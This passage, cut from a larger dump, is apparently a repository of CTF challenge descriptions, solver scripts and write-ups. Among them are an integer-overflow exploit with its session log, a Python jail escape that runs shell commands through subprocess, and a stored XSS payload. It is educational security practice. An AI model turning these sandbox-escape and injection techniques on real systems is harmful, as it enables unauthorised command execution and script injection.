thought format strings were only in C???\n\n**Attachments**\n\n[https://imaginaryctf.org/r/14BD-stonks.py](https://imaginaryctf.org/r/14BD-stonks.py) `nc chal.imaginaryctf.org 42014`\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.7218543291091919, "alphanum_fraction": 0.7549669146537781, "avg_line_length": 25.16666603088379, "blob_id": "e78570caef4b397d4f3b34aee3cbab7e51a3c9e3", "content_id": "ed288380e4176071c2ab8e990072398c3928e163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 151, "license_type": "no_license", "max_line_length": 58, "num_lines": 6, "path": "/2021/HeroCTF_v3/PwnQL_#2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Extract the admin's password from the database.\n\nURL : http://chall1.heroctf.fr:8080 (same URL than before)\n\nFormat : Hero{password}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.6272401213645935, "alphanum_fraction": 0.8100358247756958, "avg_line_length": 55.79999923706055, "blob_id": "4c8ff2641619be734ece4066eec978ee1b267e5c", "content_id": "b3db5209dfc92a3e2d20bffb212c770cd7ff71f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 279, "license_type": "no_license", "max_line_length": 112, "num_lines": 5, "path": "/2021/RaRCTF_2021/sRSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "we have created the securest possible rsa algorithm!\n\n[script.py - c68522](https://files-ctf.rars.win/challenge-files/43/c685225e786d1ecc9b7a60ec0205eb43/script.py)\n\n[output.txt - 2d9d04](https://files-ctf.rars.win/challenge-files/43/2d9d04a8ed03feea0c2d29a7c034452f/output.txt)\n" }, { "alpha_fraction": 0.4421272277832031, "alphanum_fraction": 0.45618557929992676, "avg_line_length": 19.450000762939453, "blob_id": "dff8b0efa55cad942495e485fcbe02e61a05e549", "content_id": "0dcfc85145f3d11e7baf8a9694568f202060c71a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 60, "num_lines": 20, "path": "/2021/BCACTF_2.0/Cipher_Mishap/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import string\n\nUPPER = string.ascii_uppercase * 2\n\nl = open('text.txt','r').read().replace('\\n','').split(', ')\n\nplain = ''\nfor s in l:\n    ss = s.split('-')\n    c = chr(int(ss[0],8))\n    if(len(ss) == 2):\n        c = 
UPPER[UPPER.find(c) + 23] # ROT23\n        if(ss[1] == 'Y'):\n            plain += c\n        else:\n            plain += c.lower()\n    else:\n        plain += c\n\nprint(plain)" }, { "alpha_fraction": 0.460317462682724, "alphanum_fraction": 0.7301587462425232, "avg_line_length": 12.600000381469727, "blob_id": "9f8e74ca06ab0fbff85d29710710c070e6cd2b7f", "content_id": "4b1d7cbdbaa40b325c85637a19c6295c92e53362", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 63, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/Sessions/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Find the flag.\n\nhttp://34.69.61.54:4777\n\nAuthor: f1rehaz4rd\n" }, { "alpha_fraction": 0.7719298005104065, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 33.400001525878906, "blob_id": "15e1d916561110edc125f581f092564909753c55", "content_id": "8812184a7ed394954d13d0f1e849b36f69b31d20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 171, "license_type": "no_license", "max_line_length": 122, "num_lines": 5, "path": "/2020/pbctf_2020/Sploosh/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I wanted to make my own URL scraper, but parsing HTML is hard, so I used some random open source scraping project instead.\n\nhttp://sploosh.chal.perfect.blue/\n\nBy: Corb3nik" }, { "alpha_fraction": 0.756302535533905, "alphanum_fraction": 0.767507016658783, "avg_line_length": 70.5999984741211, "blob_id": "83d7c96ed19469aa94d7967afae5d5da06593949", "content_id": "f3a946b84df164c2e1b292a07ee35efa702cf854", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 357, "license_type": "no_license", "max_line_length": 243, "num_lines": 5, "path": "/2020/CyberSecurityRumble2020/Wheels_n_Whales/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I've heard that [whales and wheels](http://chal.cybersecurityrumble.de:7780/) are the new hot thing. So a buddy of mine built a website where you can get your own. 
I think he hid an easter egg somewhere, but I can't get to it, can you help me?\n\n[web.py](https://storage.googleapis.com/ctf.cybersecurityrumble.de/wheelsnwhales/web.py)\n\nAuthor: gina|RedRocket" }, { "alpha_fraction": 0.47783148288726807, "alphanum_fraction": 0.5043076276779175, "avg_line_length": 26.350574493408203, "blob_id": "e91ac8a6f86e22bb4dabb9af1176864a63fa2c5a", "content_id": "d6a72b3c6ce7c26e2efd710e6bd945fc75ad7d74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4962, "license_type": "no_license", "max_line_length": 101, "num_lines": 174, "path": "/2021/BCACTF_2.0/BCA_Mart/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nWe are given the following program and its binary.\n\n```c\n#include <stdio.h>\n#include <stdlib.h>\n\nint money = 15;\n\nint purchase(char *item, int cost) {\n    int amount;\n    printf(\"How many %s would you like to buy?\\n\", item);\n    printf(\"> \");\n    scanf(\"%d\", &amount);\n\n    if (amount > 0) {\n        cost *= amount;\n        printf(\"That'll cost $%d.\\n\", cost);\n        if (cost <= money) {\n            puts(\"Thanks for your purchse!\");\n            money -= cost;\n        } else {\n            puts(\"Sorry, but you don't have enough money.\");\n            puts(\"Sucks to be you I guess.\");\n            amount = 0;\n        }\n    } else {\n        puts(\"I'm sorry, but we don't put up with pranksters.\");\n        puts(\"Please buy something or leave.\");\n    }\n\n    return amount;\n}\n\nint main() {\n    int input;\n\n    setbuf(stdout, NULL);\n    setbuf(stdin, NULL);\n    setbuf(stderr, NULL);\n\n    puts(\"Welcome to BCA MART!\");\n    puts(\"We have tons of snacks available for purchase.\");\n    puts(\"(Please ignore the fact we charge a markup on everything)\");\n\n    while (1) {\n        puts(\"\");\n        puts(\"1) Hichew™: $2.00\");\n        puts(\"2) Lays® Potato Chips: $2.00\");\n        puts(\"3) Water in a Bottle: $1.00\");\n        puts(\"4) Not Water© in a Bottle: $2.00\");\n        puts(\"5) BCA© school merch: $20.00\");\n        puts(\"6) Flag: $100.00\");\n        puts(\"0) Leave\");\n        puts(\"\");\n        printf(\"You currently have $%d.\\n\", money);\n        puts(\"What would you like to buy?\");\n\n        printf(\"> \");\n        scanf(\"%d\", &input);\n\n        switch (input) {\n            case 0:\n                puts(\"Goodbye!\");\n                puts(\"Come back soon!\");\n                puts(\"Obviously, to spend more money :)\");\n                return 0;\n            case 1:\n                purchase(\"fruity pieces of goodness\", 2);\n                break;\n            case 2:\n                purchase(\"b̶a̶g̶s̶ ̶o̶f̶ ̶a̶i̶r̶ potato chips\", 2);\n                break;\n            case 3:\n                purchase(\"bottles of tap water\", 1);\n                break;\n            case 4:\n                purchase(\"generic carbonated beverages\", 2);\n                break;\n            case 5:\n                purchase(\"wonderfully-designed t-shirts\", 20);\n                break;\n            case 6:\n                if (purchase(\"super-cool ctf flags\", 100) > 0) {\n                    FILE *fp = fopen(\"flag.txt\", \"r\");\n                    char flag[100];\n\n                    if (fp == NULL) {\n                        puts(\"Hmm, I can't open our flag.txt file.\");\n                        puts(\"Sorry, but looks like we're all out of flags.\");\n                        puts(\"Out of luck, we just sold our last one a couple mintues ago.\");\n                        puts(\"[If you are seeing this on the remote server, please contact admin].\");\n                        exit(1);\n                    }\n\n                    fgets(flag, sizeof(flag), fp);\n                    puts(flag);\n                }\n                break;\n            default:\n                puts(\"Sorry, please select a valid option.\");\n        }\n    }\n}\n```\n\nEntering `6` and getting the `purchase` to succeed yields the flag.\n\n```\ncase 6:\n    if (purchase(\"super-cool ctf flags\", 100) > 0) {\n        FILE *fp = fopen(\"flag.txt\", \"r\");\n        char flag[100];\n\n        if (fp == NULL) {\n            puts(\"Hmm, I can't open our flag.txt file.\");\n            puts(\"Sorry, but looks like we're all out of flags.\");\n            puts(\"Out of luck, we just sold our last one a couple mintues ago.\");\n            
puts(\"[If you are seeing this on the remote server, please contact admin].\");\n            exit(1);\n        }\n\n        fgets(flag, sizeof(flag), fp);\n        puts(flag);\n    }\n    break;\n```\n\nInside `purchase`, `cost *= amount;` multiplies in a 32-bit `int`, so we just supply an `amount` large enough that the product overflows and `cost` goes negative.\n\n```\nscanf(\"%d\", &amount);\n\nif (amount > 0) {\n    cost *= amount;\n    printf(\"That'll cost $%d.\\n\", cost);\n    if (cost <= money) {\n        puts(\"Thanks for your purchse!\");\n        money -= cost;\n    } else {\n        puts(\"Sorry, but you don't have enough money.\");\n        puts(\"Sucks to be you I guess.\");\n        amount = 0;\n    }\n```
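\n\nA quick check of the wraparound (Python, modelling the usual two's-complement truncation of the product; `cost = 100`, `amount = 2147483647`):\n\n```py\ncost = (100 * 2147483647) & 0xffffffff   # truncate the product to 32 bits\nif cost >= 0x80000000:                   # reinterpret as a signed int\n    cost -= 0x100000000\nprint(cost)  # -100\n```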
\n\nEntering the maximum `int` value, `2147483647`, did the trick.\n\n```\n$ nc bin.bcactf.com 49153\nWelcome to BCA MART!\nWe have tons of snacks available for purchase.\n(Please ignore the fact we charge a markup on everything)\n\n1) Hichew™: $2.00\n2) Lays® Potato Chips: $2.00\n3) Water in a Bottle: $1.00\n4) Not Water© in a Bottle: $2.00\n5) BCA© school merch: $20.00\n6) Flag: $100.00\n0) Leave\n\nYou currently have $15.\nWhat would you like to buy?\n> 6\nHow many super-cool ctf flags would you like to buy?\n> 2147483647\nThat'll cost $-100.\nThanks for your purchse!\nbcactf{bca_store??_wdym_ive_never_heard_of_that_one_before}\n```\n\n<!-- bcactf{bca_store??_wdym_ive_never_heard_of_that_one_before} -->\n" }, { "alpha_fraction": 0.7285714149475098, "alphanum_fraction": 0.738095223903656, "avg_line_length": 19.18181800842285, "blob_id": "9f59e358b573ab6b4e741c988e8cdada2313a0e0", "content_id": "fee14dc43466d9965b2e98a90c823a0dc7876d79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 210, "license_type": "no_license", "max_line_length": 83, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Roos_World/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nSomebody hid Roo's flag on his website. Roo really needs some help.\n\n**Attachments**\n\n[http://roos-world.chal.imaginaryctf.org](http://roos-world.chal.imaginaryctf.org/)\n\n**Author**\n\nFIREPONY57" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.5426900386810303, "avg_line_length": 26.612903594970703, "blob_id": "4f891e4c7ceb30f745690f02ed241a96e8c98768", "content_id": "d41d929ddd43f4c628003c607e07d7a52624d9b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 57, "num_lines": 31, "path": "/2021/WaniCTF21-spring/Automaton_Lab/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nrule = {'111':'0', '110':'0', '101':'0', '100':'1', \n        '011':'1', '010':'1', '001':'1', '000':'0'}\n\ndef rule30(state, gen):\n    # The 15-cell ring is periodic: Gen(46) == Gen(1501), i.e. period 1455\n    if gen > 1500:\n        gen = gen % 1455\n    for _ in range(gen):\n        next_state = \"\"\n        state = state[-1] + state + state[0]\n        for i in range(15):\n            next_state += rule[state[i:i+3]]\n        state = next_state\n    return state\n\nio = remote('automaton.mis.wanictf.org','50020')\nio.recvuntil('(press enter key to continue)')\nio.sendline()\nfor _ in range(3):\n    io.recvuntil('= ')\n    init = io.recvline().decode('utf-8').replace('\\n','')\n    io.recvuntil('= ')\n    gen = int(io.recvline().decode('utf-8'))\n    print(rule30(init,gen))\n    io.recvuntil('> ')\n    io.sendline(rule30(init,gen))\n    print(io.recvline())\nprint(io.recvline())\nio.close()" }, { "alpha_fraction": 0.7748979616165161, "alphanum_fraction": 0.8269230723381042, "avg_line_length": 30.200000762939453, "blob_id": "d82dc29d750ac30e8501afd82f0be72e1e01ba3e", "content_id": "03efaadf922478ba411a57c9475ede446faae3ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 192, "license_type": "no_license", "max_line_length": 111, "num_lines": 5, "path": "/2021/WaniCTF21-spring/presentation/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "At this rate we can't present the FLAG...\n\n[for-presentation.zip](https://score.wanictf.org/storage/bsfrfq7m02rxxquxdbd98mmvl3rlf8r7/for-presentation.zip)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.6855624318122864, "alphanum_fraction": 0.6997342705726624, "avg_line_length": 27.25, "blob_id": "e6a94e0d5aad195ce5d3abae946509db501a6e17", "content_id": "502190346ef4281f21cbe5c35b60ae676a2c64a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1423, "license_type": "no_license", "max_line_length": 207, "num_lines": 40, "path": "/2021/UMassCTF_2021/ekrpat/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nRunning the `nc` command prints the following message.\n\n```\nFrg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -ekrpat-v Frg ,cnn yd.b i.y abryd.p cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv\n```\n\nSearching for the challenge title `ekrpat` turns up the following keyboard image.\n\n![](img/2021-03-28-18-57-49.png)\n\nThis is the key layout known as the **Dvorak** layout.\n\nWe can convert the text with the following site.\n\n* https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard\n\n```\nYou've broken my code! Escape without the help of eval, exec, import, open, os, read, system, and write. First, enter 'dvorak'. You will then get another input which you can use try to break out of the jail.\n```
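\n\nThe conversion can also be scripted: look each character up in the Dvorak layout and emit the QWERTY key at the same physical position (a sketch; the layout strings below are the standard US QWERTY/Dvorak rows):\n\n```py\nqwerty = \"-=qwertyuiop[]asdfghjkl;'zxcvbnm,./\" + '_+QWERTYUIOP{}ASDFGHJKL:\"ZXCVBNM<>?'\ndvorak = \"[]',.pyfgcrl/=aoeuidhtns-;qjkxbmwvz\" + '{}\"<>PYFGCRL?+AOEUIDHTNS_:QJKXBMWVZ'\ntable = str.maketrans(dvorak, qwerty)\nprint(\"Frg-k. xprt.b mf jre.!\".translate(table))  # You've broken my code!\n```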
\n\nAfter entering `dvorak`, we can run a Python program. As the message says, `eval`, `exec`, and the like are blocked, so we need a workaround — `__import__('subprocess')` is not on the banned list.\n\n```bash\n>>> dvorak\n>>> __import__('subprocess').call('dir',shell=True); \nDockerfile ekrpat.py flag ojal. ynetd\nDockerfile ekrpat.py flag ojal. ynetd\nPlay by the rules!!! Try again.\n\n>>> dvorak\n>>> __import__('subprocess').call('cat\\x20flag',shell=True);print('hoge');\nUMASS{dvorak_rules}\nUMASS{dvorak_rules}\nhoge\nhoge\n```\n\n<!-- UMASS{dvorak_rules} -->" }, { "alpha_fraction": 0.7024608254432678, "alphanum_fraction": 0.8143176436424255, "avg_line_length": 39.727272033691406, "blob_id": "193a0ad7085f63347fb50ee1b5daea787b3ffa67", "content_id": "4039a95d68827f8b160b2ea9a68d5fc5c03f821d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 447, "license_type": "no_license", "max_line_length": 116, "num_lines": 11, "path": "/2020/pbctf_2020/Ainissesthai/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "A team of codebreakers had to invent computers to break this cipher. Can you figure out what the flag is?\n\nRemote: `nc ainissesthai.chal.perfect.blue 1`\n\nNote: enter flag as `pbctf{UPPERCASEPLAINTEXT}`\n\nBy: UnblvR\n\n[ainissesthai.py](https://storage.googleapis.com/pbctf-2020-ctfd/2b5b7afd062857896e90103dccb0785b/ainissesthai.py)\n\n[requirements.txt](https://storage.googleapis.com/pbctf-2020-ctfd/0bc784d368759bd74ac76a5ecf6127f8/requirements.txt)" }, { "alpha_fraction": 0.35049018263816833, "alphanum_fraction": 0.44607841968536377, "avg_line_length": 16.782608032226562, "blob_id": "6a8ce4b37351f5e510dd397edd1152740ed10429", "content_id": "615852d027f78c4f186549238895b755bc9b3ad4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 410, "license_type": "no_license", "max_line_length": 71, "num_lines": 23, "path": "/2021/BambooFox_CTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# BambooFox CTF 2021\n\n* https://ctf.bamboofox.tw/\n\n* 2021/01/16 11:00 JST — 2021/01/18 11:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------- | ------- | ----: | -----: |\n| Reversing | [Flag Checker](Flag_Checker) | Verilog | 50 | ? 
|\n\n### Unsolved\n\n---\n\n## Result\n\n* 51 points\n\n* 169 / 513 (> 1 pt)" }, { "alpha_fraction": 0.6300366520881653, "alphanum_fraction": 0.7399267554283142, "avg_line_length": 18.266666412353516, "blob_id": "dbd7420479709551d38a6c623e704e0d795ab345", "content_id": "b6d32af67a820859edbd1d687b90af67f8b2ae03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 485, "license_type": "no_license", "max_line_length": 72, "num_lines": 15, "path": "/2020/WaniCTF/striped_table/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nOn the challenge page, you can register and display memos.\n\n![](img/2020-11-22-14-16-28.png)\n\nThe title and body of a memo are rendered verbatim, so to get `alert(19640503)` to run, we register a memo whose body is the following.\n\n```html\n<script>alert(19640503);</script>\n```\n\nThe contents of the `<script>` tag execute, and we obtain the flag.\n\n<!-- FLAG{simple_cross_site_scripting} -->" }, { "alpha_fraction": 0.7409201264381409, "alphanum_fraction": 0.7578692436218262, "avg_line_length": 26.600000381469727, "blob_id": "76d4037106398e9ccbe52a85e47e65784a90216a", "content_id": "97d5d446c6bb143d23a39730c93b4d45dcffe229", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 413, "license_type": "no_license", "max_line_length": 158, "num_lines": 15, "path": "/2021/BCACTF_2.0/Zstegosaurus/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My friend forgot our pet zstegosaurus's name. Luckily for him, I hid the dinosaur's name somewhere in this picture...but now I can't find it. Can you help us?\n\n[zstegosaurus.png](https://objects.bcactf.com/bcactf2/zstegosaurus/zstegosaurus.png)\n\nHint 1 of 3\n\nThe image should be black and white...right?\n\nHint 2 of 3\n\nTry opening the file in a hex editor.\n\nHint 3 of 3\n\nThe format for the flag is bcactf{flagName}" }, { "alpha_fraction": 0.7888198494911194, "alphanum_fraction": 0.7888198494911194, "avg_line_length": 31.200000762939453, "blob_id": "fa9a1d99ca9509e57fd9de7a7adfe07694dbe99e", "content_id": "d6f2af7493d56f5af711d21c4a903f64a40a1f06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "no_license", "max_line_length": 122, "num_lines": 5, "path": "/2021/HeroCTF_v3/We_need_you_3_5/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We know for sure that this server allowed to connect to infected machines. 
Can you check if a connection was instantiated?\n\nAuthor: Worty\n\nFormat: Hero{IP:Port}\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7678571343421936, "avg_line_length": 21.600000381469727, "blob_id": "31fac752a35dc57c127d090d05488c37e3dc80ca", "content_id": "90971e4ae71af876949ca2f76474b8ad76993e0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 206, "license_type": "no_license", "max_line_length": 52, "num_lines": 5, "path": "/2020/WaniCTF/DevTools_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nAs the problem statement instructs, use the developer tools [F12] to view the page source; the flag is written in a comment line.\n\n<!-- FLAG{you_can_read_html_using_devtools} -->" }, { "alpha_fraction": 0.6441717743873596, "alphanum_fraction": 0.7914110422134399, "avg_line_length": 53.33333206176758, "blob_id": "d2529d2452e9bf05bd079b9f31e587b59a732d10", "content_id": "8ae21a4415133e1dbbe2b792c553cfb240c9e107", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 163, "license_type": "no_license", "max_line_length": 110, "num_lines": 3, "path": "/2021/RaRCTF_2021/babycrypt/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It's not a CTF without a baby RSA challenge right?\n\n[server.py - 669ede](https://files-ctf.rars.win/challenge-files/26/669ede7b0f3a468e12f1fc95a65694df/server.py)\n" }, { "alpha_fraction": 0.5185185074806213, "alphanum_fraction": 0.5491143465042114, "avg_line_length": 23.84000015258789, "blob_id": "b077d2c46e5bdca0a1091230e5322073663c1833", "content_id": "6ff3d806718d805b4f7e366c9857d4b86e4d6a29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "no_license", "max_line_length": 54, "num_lines": 25, "path": "/2021/UIUCTF_2021/dhke_intro/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Cipher import AES\n\nfor k in range(31):\n    k = str(k)\n\n    # pad key to 16 bytes (128bit)\n    key = \"\"\n    i = 0\n    padding = \"uiuctf2021uiuctf2021\"\n    while (16 - len(key) != len(k)):\n        key = key + padding[i]\n        i += 1\n    key = key + k\n    key = bytes(key, encoding='ascii')\n\n    with open('output.txt', 'rb') as f:\n        out = bytes.fromhex(f.read().decode())\n\n    iv = bytes(\"kono DIO daaaaaa\", encoding = 'ascii')\n    cipher = AES.new(key, AES.MODE_CFB, iv)\n    ciphertext = cipher.decrypt(out)\n\n    if b'uiuctf' in ciphertext:\n        print(f'{key = }')\n        print(f'{ciphertext = }')\n" }, { "alpha_fraction": 0.27734139561653137, "alphanum_fraction": 0.6725075244903564, "avg_line_length": 35.23404312133789, "blob_id": "10e392683934bb3fd9d351f7fd7e2c2805f3bfcb", "content_id": "fcdb485f23f7774e625ec50249ed86419000d899", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1655, "license_type": "no_license", "max_line_length": 619, "num_lines": 47, "path": "/2020/CyberSecurityRumble2020/Pady_McPadface/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Original https://ctftime.org/writeup/24770\n\nfrom pwn import *\nfrom Crypto.Util.number import long_to_bytes\n\ncontext.log_level = \"error\"\n\n# get jacobi symbol\ndef jacobi(a, n):\n assert(n > a > 0 and n%2 == 1)\n t = 1\n while a != 0:\n while a % 2 == 0:\n a //= 2\n r = n % 8\n if r == 3 or r == 5:\n t = -t\n a, n = n, a\n if a % 4 == n % 4 == 3:\n t = -t\n a %= n\n if n == 1:\n return t\n else:\n return 
0\n\nn=23946008544227658126007712372803958643232141489757386834260550742271224503035086875887914418064683964046938371640632153677880813529023769841157840969433316734058706481517878257755290676559343682013294580085557476138201639446709290119631383493940405818550255561589074538261117055296294434994144540224412018398452371792093095280080422459773487177339595746894989682038387107119249733105558301840478252766907821053044992141741079156669562032221433390029219634673005161989684970682781410366155504440886376453225497112165607897302209008685179791558898003720802478389914297472563728836647547791799771532020349546729665006643\n\nHOST = 'chal.cybersecurityrumble.de'\nPORT = 34187\nL = 263 # number of bits to retrieve\n\nsols = [0 for _ in range(L)]\nfor i in range(100):\n r = remote(HOST,PORT)\n res = r.recvall().split(b\"\\n\")\n cs = []\n for l in res:\n try:\n cs.append(int(l))\n except:\n pass\n assert len(cs) == L\n for j,c in enumerate(cs):\n if jacobi(c,n) == -1: # we are sure that it's not a square\n sols[j] = 1\n print( long_to_bytes( int(\"\".join(map(str,sols)),2)).decode(\"utf-8\") )" }, { "alpha_fraction": 0.7417040467262268, "alphanum_fraction": 0.7730941772460938, "avg_line_length": 78.71428680419922, "blob_id": "cd195b4160fcf48637624eb300d70c67492fee68", "content_id": "e72f58222aa89e034f14d42b84b9459c960ab13f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1143, "license_type": "no_license", "max_line_length": 468, "num_lines": 14, "path": "/2020/hxp_CTF_2020/Secure_Program_Config/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Description:\nPlease redownload the challenge; we fixed a packing issue.\nDue to corona, I’m in home office and yesterday, I (while not being completely sober) played around with some alarm systems of the clients and … apparently … changed my engineer password since I cannot access anything anymore … my boss has called this morning and threatened to fire me if I don’t fix that ASAP … I have not the slightest idea what my password could be or how I can get it back … can you please help me recover it???!! I have to fix that mess somehow …\n\nI removed the clients’ data to not get into even more trouble …\n\nBefore I forget: Download [SPC Connect Pro](https://www.spcconnectpro.com/install/setup.exe) and start it pointing to the folder `SPC Products`. (The software will ask you which directory it should use)\n\nOur company login to the software is `admin/admin`. 
Luckily, I did not change that …\n\nOh no … my boss is calling again … we talk later … good luck.\n\nDownload:\n[Secure Program Config-f0a3e4f922071458.tar.xz (716 Bytes)](https://2020.ctf.link/assets/files/Secure%20Program%20Config-f0a3e4f922071458.tar.xz)" }, { "alpha_fraction": 0.6724137663841248, "alphanum_fraction": 0.7068965435028076, "avg_line_length": 22.399999618530273, "blob_id": "898823707207f4de59ce49a4d8ab3e4ab0499890", "content_id": "bd85424d8d8d88e49abe07e30ad40a1c62eaa6f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/2021/Real_World_CTF_3rd/HOME/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nio = remote('home.realworldctf.com',1337)\nmsg = io.recvall()\nprint(msg.decode('ascii'))\nio.close()" }, { "alpha_fraction": 0.5065789222717285, "alphanum_fraction": 0.5197368264198303, "avg_line_length": 24.33333396911621, "blob_id": "4989fc80af52928dd6eb6b4db338a7a466d47c38", "content_id": "02c2710c0c7b91ee83c4d99b5f37137fef70dfe6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 304, "license_type": "no_license", "max_line_length": 60, "num_lines": 12, "path": "/2021/HeroCTF_v3/Ping_Pong/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\n\nbinary = \"\"\nwith open(os.path.dirname(__file__)+\"/output.txt\",\"r\") as f:\n    text = f.readline()\n    while text:\n        if \"PING\" in text:\n            binary += \"1\"\n        else:\n            binary += \"0\"\n        text = f.readline()\nprint(bytearray.fromhex(hex(int(binary,2))[2:]).decode())\n" }, { "alpha_fraction": 0.7989949584007263, "alphanum_fraction": 0.8174204230308533, "avg_line_length": 25, "blob_id": "7aceddf9773421f2aacf30c76b569ac4a480d25b", "content_id": "5017457a6614988bede7771ae4301daab9c74d06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 901, "license_type": "no_license", "max_line_length": 101, "num_lines": 23, "path": "/2020/WaniCTF/SQL_Challenge_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Challenge page: https://sql2.wanictf.org/index.php?year=2011\n\nThe previous page felt unsafe after all, so I rebuilt it. Now it should be fine.\n\n(Hint)\n\nThis is a SQL injection challenge.\n\nIf needed, refer to the source code (index.php) and the database schema (1_schema.sql).\n\n(Note)\n\nsql-chall-2.zip is not required to solve the challenge; it is provided so you can reproduce the challenge environment locally with docker-compose.\n\nFeel free to use it if you are interested.\n\n[index.php](https://score.wanictf.org/storage/qpgnvwdqxyeixrkqoleweqawlupzgylc/index.php)\n\n[1_schema.sql](https://score.wanictf.org/storage/eaecpxpaqwkkwaisxcfosjzplsbwwizu/1_schema.sql)\n\n[sql-chall-2.zip](https://score.wanictf.org/storage/qxuhakpsjjrywgjfmsngffmmapgcahqo/sql-chall-2.zip)\n\nWriter : okmt, nkt" }, { "alpha_fraction": 0.4740484356880188, "alphanum_fraction": 0.8615916967391968, "avg_line_length": 57, "blob_id": "f6abf90bdb3c76bda64170618cf8498e72e663c9", "content_id": "a585372389523b739e5bf345bc2a35a8c7680a9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 289, "license_type": "no_license", "max_line_length": 218, "num_lines": 5, "path": "/2020/HITCON_CTF_2020/AC1750/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My router is weird, can you help me find the 
